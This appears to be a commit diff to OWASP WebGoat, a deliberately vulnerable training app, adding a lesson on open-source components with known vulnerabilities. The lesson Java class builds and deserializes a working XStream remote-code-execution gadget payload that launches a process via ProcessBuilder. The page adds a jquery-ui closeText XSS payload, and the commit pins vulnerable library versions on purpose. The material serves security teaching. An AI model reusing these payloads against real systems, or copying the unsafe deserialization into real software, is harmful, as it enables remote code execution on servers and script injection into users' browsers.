Vulnerable components draft, fixed missing properties in httpbasics when user input was empty

webgoat-container/src/main/resources/static/js/goatApp/view/GoatRouter.js

@@ -1,5 +1,6 @@
 define(['jquery',
     'libs/jquery-vuln',
+    'jqueryui',
     'underscore',
     'backbone',
     'goatApp/controller/LessonController',
@@ -10,6 +11,7 @@ define(['jquery',
     'goatApp/view/TitleView'
 ], function ($,
              $vuln,
+             jqueryui,
              _,
              Backbone,
              LessonController,

webgoat-container/src/main/resources/static/js/main.js

@@ -14,6 +14,7 @@ require.config({
   baseUrl: "js/",
   paths: {
     jquery: 'libs/jquery-2.2.4.min',
+    jqueryui: 'libs/jquery-ui-1.10.4',
     underscore: 'libs/underscore-min',
     backbone: 'libs/backbone-min',
     text: 'libs/text',
@@ -27,6 +28,10 @@ require.config({
   },
 
   shim: {
+	"jqueryui": {
+	  exports:"$",
+	  deps: ['jquery']
+	},
     underscore: {
       exports: "_"
     },
@@ -37,6 +42,6 @@ require.config({
   }
 });
 
-require(['jquery','libs/jquery-base','libs/jquery-vuln','underscore','backbone','goatApp/goatApp'], function($,jqueryBase,jqueryVuln,_,Backbone,Goat){
+require(['jquery','libs/jquery-base','libs/jquery-vuln','jqueryui', 'underscore','backbone','goatApp/goatApp'], function($,jqueryBase,jqueryVuln,jqueryui,_,Backbone,Goat){
     Goat.initApp();
 });

webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat/plugin/HttpBasicsLesson.java

@@ -58,7 +58,7 @@ public class HttpBasicsLesson extends AssignmentEndpoint {
                 .feedbackArgs(new StringBuffer(person).reverse().toString())
                 .build());
         } else {
-            return trackProgress(failed().feedback("http-basics.close").build());
+            return trackProgress(failed().feedback("http-basics.empty").build());
         }
     }
 }

webgoat-lessons/http-basics/src/main/resources/plugin/i18n/WebGoatLabels.properties

@@ -10,5 +10,6 @@ http-basics.hints.http_basic_quiz.2=Try to intercept the request with <a href='h
 
 http-basics.reversed=The server has reversed your name: {0}
 
+http-basics.close=Try again: but this time enter a value before hitting go.
 http-basics.incorrect=You are close, try again: the HTTP Command is incorrect.
 http-basics.magic=You are close, try again: the magic number is incorrect.

webgoat-lessons/vulnerable-components/pom.xml

@@ -8,5 +8,12 @@
         <artifactId>webgoat-lessons-parent</artifactId>
         <version>8.0-SNAPSHOT</version>
     </parent>
+	<dependencies>
+		<dependency>
+			<groupId>com.thoughtworks.xstream</groupId>
+			<artifactId>XStream</artifactId>
+			<version>1.4.7</version>
+		</dependency>
+	</dependencies>
 
 </project>

webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/plugin/VulnerableComponentsLesson.java

@@ -1,18 +1,17 @@
 package org.owasp.webgoat.plugin;
 
-import org.owasp.webgoat.endpoints.AssignmentEndpoint;
+import java.io.IOException;
-import org.owasp.webgoat.endpoints.AssignmentHints;
+
-import org.owasp.webgoat.endpoints.AssignmentPath;
+import javax.servlet.http.HttpServletRequest;
-import org.owasp.webgoat.lessons.AttackResult;
+
+import org.owasp.webgoat.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.assignments.AssignmentPath;
+import org.owasp.webgoat.assignments.AttackResult;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
-
+import com.thoughtworks.xstream.XStream;
-import javax.servlet.http.HttpServletRequest;
-import javax.ws.rs.Path;
-
-import java.io.IOException;
 
 /**
  * *************************************************************************************************
@@ -52,11 +51,35 @@ import java.io.IOException;
 public class VulnerableComponentsLesson extends AssignmentEndpoint {
 
 	@RequestMapping(method = RequestMethod.POST)
-	public @ResponseBody AttackResult completed(@RequestParam String person, HttpServletRequest request) throws IOException {
+	public @ResponseBody AttackResult completed(@RequestParam String payload) throws IOException {
-	    if (!person.toString().equals("")) {
+		String process = "open"; 		
-	        return trackProgress(AttackResult.success("The server has reversed your name: " + new StringBuffer(person).reverse().toString()));
+		String arguments = "/Applications/Calculator.app";		
+		
+		String payload2 = "<sorted-set>" +  
+						 "<string>foo</string>" +
+						 "<dynamic-proxy>" + 
+						 "<interface>java.lang.Comparable</interface>" +
+						 "<handler class=\"java.beans.EventHandler\">" +
+						 "    <target class=\"java.lang.ProcessBuilder\">" +
+						 "         <command>" +
+						 "             <string>" + process + "</string>" +
+						 "             <string>" + arguments + "</string>" +
+						 "        </command>" +
+						 "    </target>" +
+						 "    <action>start</action>" +
+						 "</handler>" + 
+						 "</dynamic-proxy>" + 						
+						"</sorted-set>";
+		XStream xstream = new XStream();
+		String xml = (String)xstream.fromXML(payload2);
+       if (!payload.toString().equals("")) {
+            return trackProgress(success()
+                .feedback("vulnerable-components")
+                .feedbackArgs(xml)
+                .build());
         } else {
-	        return trackProgress(AttackResult.failed("You are close, try again"));
+            return trackProgress(failed().feedback("vulnerable-components.close").build());
-	    }
+        }
+
 	}
 }

webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/plugin/VulnerableComponentsQuiz.java

@@ -1,67 +0,0 @@
-package org.owasp.webgoat.plugin;
-
-import org.owasp.webgoat.endpoints.AssignmentEndpoint;
-import org.owasp.webgoat.endpoints.AssignmentPath;
-import org.owasp.webgoat.lessons.AttackResult;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.RequestMethod;
-import org.springframework.web.bind.annotation.RequestParam;
-import org.springframework.web.bind.annotation.ResponseBody;
-
-import javax.servlet.http.HttpServletRequest;
-import javax.ws.rs.Path;
-
-import java.io.IOException;
-
-/**
- * *************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
- * for free software projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-@AssignmentPath("/VulnerableComponents/attack2")
-public class VulnerableComponentsQuiz extends AssignmentEndpoint {
-
-	@RequestMapping(method = RequestMethod.POST)
-	public @ResponseBody AttackResult completed(@RequestParam String answer, @RequestParam String magic_answer, @RequestParam String magic_num, HttpServletRequest request) throws IOException {
-        if ("POST".equals(answer.toUpperCase()) && magic_answer.equals(magic_num)) {
-	        return trackProgress(AttackResult.success());
-	    } else {
-	    	StringBuffer message = new StringBuffer();
-	    	if (!"POST".equals(answer.toUpperCase())) {
-	    		message.append("The HTTP Command is incorrect.  ");
- 			}
-	    	if (!magic_answer.equals(magic_num)){
-	    		message.append("The magic number is incorrect.  ");
-	    	}
-	        return trackProgress(AttackResult.failed("You are close, try again.  " + message.toString()));
-	    }
-	}
-}

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/html/VulnerableComponents.html

@@ -2,13 +2,31 @@
 
 <html xmlns:th="http://www.thymeleaf.org">
 
+    <link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css" />
 	<div class="lesson-page-wrapper">
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
 		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
 		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
 		<div class="adoc-content" th:replace="doc:VulnerableComponents_plan.adoc"></div>
 	</div>
-
+	<div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content0.adoc"></div>
+	</div>
+	<div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content1.adoc"></div>
+	</div>
+	<div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content1a.adoc"></div>
+	</div>
 
 	<div class="lesson-page-wrapper">
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
@@ -21,12 +39,54 @@
                 <!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
                 <!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
                 <!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
-					<script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
+					<table>
-					<script>
+						<tr>
-					webgoat.customjs.jquery_2_1_4(document).ready(function() { alert(webgoat.customjs.jquery_2_1_4().jquery); });
+							<td>Clicking go will execute a jquery-ui close dialog:</td>
-					$(document).ready(function() { alert(jQuery.fn.jquery); });
+							<td><input name="closetext" value="" type="TEXT" /><input
+								name="SUBMIT" value="Go!" type="SUBMIT" onclick="webgoat.customjs.vuln_jquery_ui()" /></td>
+							<td></td>
+						</tr>
+					</table>
+					<script th:inline="javascript">
+					/*<![CDATA[*/
+					webgoat.customjs.vuln_jquery_ui = function()
+					{
+						webgoat.customjs.jquery('#dialog').dialog({ closeText: 'OK<script>alert("XSS")<\/script>' });
+		        	};
+					/*]]>*/
 						</script>
-				    <div id="dialog" title="Dialog Title">Content here!</div>
+				<div id="dialog" title="jquery-ui-1.10.4">This dialog should have exploited a known flaw in jquery-ui:1.10.4 and allowed a XSS attack to occur</div>
+				<!-- do not remove the two following div's, this is where your feedback/output will land -->
+				<div class="attack-feedback"></div>
+				<div class="attack-output"></div>
+				<!-- ... of course, you can move them if you want to, but that will not look consistent to other lessons -->
+			</div>
+
+		</div>
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content2a.adoc"></div>
+		<div class="attack-container">
+			<!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
+			<div id="lessonContent">
+                <!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
+                <!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
+                <!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
+					<table>
+						<tr>
+							<td>Clicking go will execute a jquery-ui close dialog:</td>
+							<td><input name="closetext" value="" type="TEXT" /><input
+								name="SUBMIT" value="Go!" type="SUBMIT" onclick="webgoat.customjs.jquery_ui()" /></td>
+							<td></td>
+						</tr>
+					</table>
+					<script th:inline="javascript">
+					/*<![CDATA[*/
+					webgoat.customjs.jquery_ui = function()
+					{
+						webgoat.customjs.jquery('#dialog2').dialog({ closeText: 'OK' });
+		        	};
+					/*]]>*/
+						</script>
+				<div id="dialog2" title="jquery-ui-1.12.0">This dialog should have prevented the above exploit using the EXACT same code in WebGoat but using a later version of jquery-ui.</div>
 				<!-- do not remove the two following div's, this is where your feedback/output will land -->
 				<div class="attack-feedback"></div>
 				<div class="attack-output"></div>
@@ -36,4 +96,69 @@
 		</div>
 	</div>
 
+	<div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content3.adoc"></div>
+	</div>
+	<div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content4.adoc"></div>
+	</div>
+	<div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content4a.adoc"></div>
+	</div>
+	<div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content4b.adoc"></div>
+	</div>
+	<div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content4c.adoc"></div>
+	</div>
+	<div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content5.adoc"></div>
+		<div class="attack-container">
+			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
+			<!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
+            <!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
+            <!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
+			<form class="attack-form" accept-charset="UNKNOWN"
+				method="POST" name="form"
+				action="/WebGoat/VulnerableComponents/attack1"
+				enctype="application/json;charset=UTF-8">
+				<div id="lessonContent">
+					<form accept-charset="UNKNOWN" method="POST" name="form"
+						action="#attack/307/100" enctype="">
+						Enter Your XML payload: <input name="paylod" value="" type="TEXT"/><input
+							name="SUBMIT" value="Go!" type="SUBMIT"/>
+					</form>
+				</div>
+			</form>
+			<!-- do not remove the two following div's, this is where your feedback/output will land -->
+			<div class="attack-feedback"></div>
+			<div class="attack-output"></div>
+			<!-- ... of course, you can move them if you want to, but that will not look consistent to other lessons -->
+		</div>
+	</div>
+	<div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content6.adoc"></div>
+	</div>
+	
 </html>

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_ProxyIntro1.adoc

@@ -1,30 +0,0 @@
-= HTTP Basics : Proxy
- 
-== HTTP Proxy Setup
-
-HTTP Proxies are tools that allow an attacker, developer or researcher to act as a man-in-the-middle on requests and responses. Since this is an
-OWASP project, we'll be using ZAP. If you are comfortable using another proxy (e.g. Burp), you can skip this. Otherwise,
-this will show you how to set up ZAP to act as a proxy on your localhost.
-
-=== Setting up ZAP
-
-Once you have 'installed' ZAP (you don't really install it, just unpack it and run it locally), we will need to:
-
-* Start ZAP
-* Configure the local proxy port
-* Point the browser at the proxy
-
-=== Start ZAP
-When ZAP starts, you will be presented with a dialog such as the one below ...
-
-image::plugin_lessons/plugin/HttpBasics/images/zap-start.png[ZAP Start,548,256,style="lesson-image"]
-
-=== Configure Proxy's Port
-
-. Select Tools > Options from the menu
-. Select Local Proxy on the left
-. Choose an available port ... Since WebGoat is using port 8080, use something different like 8090
-. Click OK
-
-image::plugin_lessons/plugin/HttpBasics/images/zap-local-proxy.png[ZAP local proxy,800,648,style="lesson-image"]
-

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_ProxyIntro2.adoc

@@ -1,31 +0,0 @@
-== HTTP Proxy Setup: The Browser
-
-=== Point Browser at Proxy
-
-There are many plugins to manage this, but this will show you how to do this manually in Firefox and Chrome.
-This will send all of your traffic to the proxy. Since we haven't set up a trusted cert. yet, that may cause issues with any https requests. More on that in a bit though. Let's stick to basics for now:
-
-==== Firefox Proxy Config
-
-. Go to your Firefox Preferences (Mac, Linux) or Options (Windows) from the menu.
-. Select _Advanced_ on the left
-. Select _Network_ in the in Advanced Pane
-. Click _Settings_
-. Select _Manual proxy configuration_
-.. input *127.0.0.1* as the Proxy
-.. input *8090* as the port
-.. check the _Use this proxy server for all protocols_ checkbox
-
-image::plugin_lessons/plugin/HttpBasics/images/firefox-proxy-config.png[Firefox Proxy Config,510,634,style="lesson-image"]
-
-==== Chrome Proxy Config
-
-. Bring up Chrome's settings form the menu
-. In the _Search settings_ box type in *proxy* and hit Enter/Return. This should bring up the Network heading with a _Change proxy settings_ button.
-. Click the _Change proxy settings_ button
-. Select the _proxies_ tab
-. Select Web Proxy (HTTP)
-. Input 127..0.0.1 in the first box under _Web Proxy Server_ and your port # (8090 is what used earlier) in the second box (to the right)
-. You may also want to clear the _Bypass proxy settings for these Hosts & Domains_ text input at the bottom, but shouldn't need to
-
-image::plugin_lessons/plugin/HttpBasics/images/chrome-manual-proxy.png[Chrome Proxy Config,700,447,style="lesson-image"]

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_ProxyIntro3.adoc

@@ -1,6 +0,0 @@
-=== Confirm it's working
-
-You should now be able to browse somewhere. We suggest starting with a plain http host.
-If it's working, ZAP's history tab will start to look something like this.
-
-image::plugin_lessons/plugin/HttpBasics/images/zap-history.png[ZAP history tab,1269,337,style="lesson-image"]

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content0.adoc

@@ -0,0 +1,13 @@
+== The Open Source Ecosystems
+
+* 10+ Million GitHub code repositories
+* 1 Million Sourceforge code repositories
+* 2500 public binary repositories
+** Some repositories have strict publisher standards
+*** Some repositories enforce source code distribution
+*** No guarantee the published source code is the source code of the published binary
+** Some repositories allow the republishing of a different set of bits for the same version
+** Some repositories allow you to remove published artifacts
+* Many different packaging systems; even for the same language
+* Different coordinates systems and level of granularity
+

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content1.adoc

@@ -1,8 +1,7 @@
 
-Enter your name in the input field below and press "Go!" to submit.	The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP	request. 
+== 2013 OWASP Top 10 - A9
 
-The user should become familiar with the features of WebGoat by manipulating the above buttons to view hints, show the HTTP request parameters, the HTTP request cookies, and the Java source code. You may also try using OWASP ZAP Attack Proxy to see the HTTP data.
+As early as 2013, thought leaders like OWASP have recognized that "WE" need to pay attention to this problem.
 
-== Try It!
 
-Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP request.
+image::plugin_lessons/plugin/VulnerableComponents/images/OWASP-2013-A9.png[caption="Figure: ", title="2013 OWASP - Top 10 - A9", alt="A9", width="800", height="500", style="lesson-image" link="https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities"]

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content1a.adoc

@@ -0,0 +1,11 @@
+
+== Components are everywhere
+
+WebGoat uses almost *200 Java and JavaScript* libraries.  Like most Java applications, we use maven to manage our java dependencies and we employ the wild, wild west strategy for managing JavaScript. 
+
+=== Vulnerable components in WebGoat?
+
+When this lesson was created WebGoat contained more than a dozen high security risks within it's components.  Most of these were not deliberate choices. How are developers supposed to track this information across the hundreds of components?
+
+image::plugin_lessons/plugin/VulnerableComponents/images/WebGoat-Vulns.png[caption="Figure: ", title="WebGoat Security Issues", alt="Security Issues", width="800", height="400", style="lesson-image"]
+

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content2.adoc

@@ -1,4 +1,6 @@
-== The Quiz
+== The exploit is not always in "your" code
+Below is an example of using the same source and different versions of jquery-ui. One is exploitable; one is not.
 
-What type of HTTP command did WebGoat use for this lesson.  A POST or a GET.
+=== jquery-ui:1.10.4
+This example allows the user to specify the content of the "closeText" for the jquery-ui dialog. This is an unlikely development scenario, however the jquery-ui dialog (TBD - show exploit link) does not defend against XSS in the button text of the close dialog.
 

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content2a.adoc

@@ -0,0 +1,4 @@
+
+=== jquery-ui:1.12.0 Not Vulnerable
+
+Using the same WebGoat source code but upgrading the jquery-ui library to a non-vulnerable version eliminates the exploit.

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content3.adoc

@@ -0,0 +1,14 @@
+== Knowing the OSS "Bill of Materials" is the starting point
+
+Modern applications are comprised of custom code and many pieces of open source. The developer is normally very knowledgeable about their custom code but less familiar with the potential risk of the libraries/components they use. Think of the bill of materials as the list of ingredients in a recipe.
+
+=== Questions we should know the answer to:
+
+* How do we know what open source components are in our applications?
+** How do we know what versions of open source components we are using?
+* How do we define the risk of open source components?
+* How do we discover the risk of open source components?
+** How do we associate a specific risk to a specific version of an open source component?
+* How do we know when a component releases a new version?
+* How do we know if a new vulnerability is found on what was previously a "good" component?
+* How do we know if we are using the authentic version of an open source component?

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content4.adoc

@@ -0,0 +1,9 @@
+== How do I generate a Bill of Materials
+
+There are several open source and paid-for solutions that will identify risk in components.  There are not many tools that will deliver a complete list of "ingredients" used within an application.  OWASP Dependency Check provides the ability to generate a bill of materials and identify potential security risk.
+
+Dependency check uses several pieces of evidence to determine the library names.  Below is a snippet of a report:
+
+image::plugin_lessons/plugin/VulnerableComponents/images/OWASP-Dep-Check.png[caption="Figure: ", title="WebGoat Bill of Materials", alt="BoM", width="988", height="515", style="lesson-image"]
+
+ 

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content4a.adoc

@@ -0,0 +1,23 @@
+== Security Information Overload
+
+=== What's important?
+
+* Is my component exploitable?
+* Is my component an authentic copy?
+** Do I understand why my component is modified?
+
+=== Security information is scattered everywhere
+
+* Multiple sources of security advisories
+** 80,000+ CVEs in the National Vulnerbility Database
+** Node Security Project, Metasploit, VulnDB, Snyk, ...
+** Thousands of website security advisories, blogs, tweets, ...
+* 600,000 GitHub events generated daily
+** 700 GitHub security related events
+** Release notes, change logs, code comments, ...
+
+=== Summary
+
+* It is not reasonable to expect a developer to continually research each component.
+* Developers are not security experts; they already have a day job.
+

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content4b.adoc

@@ -0,0 +1,23 @@
+== License Information Overload
+
+=== What's important?
+
+* Can I use this component within the context of distribution of my software?
+* Are there license incompatibilities?
+* If using a modified component, did I addressed additional license obligations?
+
+=== License information is scattered everywhere
+
+* Projects declare a license:
+** In a project metadata file.
+** On the project website or source code repository page.
+** Using a link to a license file in their own source code repository.
+** In a license file within the project source tree.
+** In the binary META-INF folder.
+* Projects include licenses as headers in the source code.
+
+=== Summary
+
+* It is difficult to determine the scope of a license.
+* A project often has license discrepancies.
+* Developers are not lawyers .

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content4c.adoc

@@ -0,0 +1,21 @@
+== Architecture Information
+
+=== What's important?
+
+* Is it old or is it stable
+* Was my lack of upgrade a deliberate choice or a lack of knowledge
+
+=== What is architectural risk?
+
+* Is my component out of date
+* Is the project I'm using no longer active
+* Is my component unpopular
+
+
+=== Summary?
+image::plugin_lessons/plugin/VulnerableComponents/images/Old-Components.png[caption="Figure: ", title="Old Components", alt="Old Components", width="355", height="304", style="lesson-image"]
+
+For the components analyzed in 25,000 applications it was found that:
+
+*  8% of  2 year old components did not have a newer version
+* 23% of 11 year old components did not have a newer version

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content5.adoc

@@ -0,0 +1,13 @@
+== Some Examples of OSS Risk
+
+=== Commons Collections
+In November of 2015, the Apache Commons Collections component latest release was 8 years old. Commons Collections was considered a reliable and stable component. A researcher found a way to exploit a deserialization issue in Commons Collections resulting in a remote code execution.  The next day... *everyone using Commons Collections was in a panic*. 
+
+Ref: http://www.pcworld.com/article/3004633/business-security/thousands-of-java-applications-vulnerable-to-nine-month-old-remote-code-execution-exploit.html[Thousands of Java applications vulnerable to nine-month-old remote code execution exploit]
+
+
+=== Dinis Cruz exploit of XStream
+XStream, a relatively common XML and JSON parsing library, has a nasty little remote code execution. Ref: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html[Dinis Cruz Blog] 
+
+Let's see if you can figure out how to exploit this in WebGoat.
+

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content6.adoc

@@ -0,0 +1,16 @@
+== Summary
+
+* Open source consumption in modern day applications has increased.
+* Open source is obtained from many different repositories with different quality standards.
+* Security information on vulnerabilities is scattered everywhere.
+* License information is often difficult to validate.
+* Most teams don't have a component upgrade strategy.
+* *Open source components are the new attack vector.*
+
+== What to do
+* Generate a bill of materials.
+** Use http://lmgtfy.com/?q=OSS+bill+of+materials[automated tooling]
+* Baseline open source consumption in your organization.
+* Develop an open source component risk management strategy to mitigate current risk and reduce future risk.
+
+

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_plan.adoc

@@ -2,10 +2,14 @@
  
 == Concept 
 
-The way we build software has changed.  The open source community is maturing and the availability of open source software has become prolific without regard to determining the provenance of the libraries used in our applications. Ref: 
+The way we build software has changed.  The open source community is maturing and the availability of open source software has become prolific without regard to determining the provenance of the libraries used in our applications. Ref:  https://www.sonatype.com/hubfs/SSC/Software_Supply_Chain_Inforgraphic.pdf?t=1485298506170[Software Supply Chain]
+
+image::plugin_lessons/plugin/VulnerableComponents/images/OpenSourceGrowing.png[caption="Figure: ", title="Software Supply Chain", alt="SSC", width="800", height="400", style="lesson-image" link="https://www.sonatype.com/hubfs/SSC/Software_Supply_Chain_Inforgraphic.pdf?t=1485298506170[Software Supply Chain"]
+
+
+This lesson will walk through the difficulties with managing dependent libraries, the risk of not managing those dependencies, and the difficulty in determining if you are at risk.
 
 == Goals
 
-The user will become familiar with exploiting components with known vulnerabilities.
+* Gain awareness that the open source consumed is as important as your own custom code.
-
+* Gain awareness of the management, or lack of management, in our open source component consumption. 
-image::plugin_lessons/plugin/VulnerableComponents/images/OWASP-2013-A9.png[caption="Figure: ", title="OWASP-2013-A9", alt="A9", width="800", height="500", style="lesson-image" link="https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities"]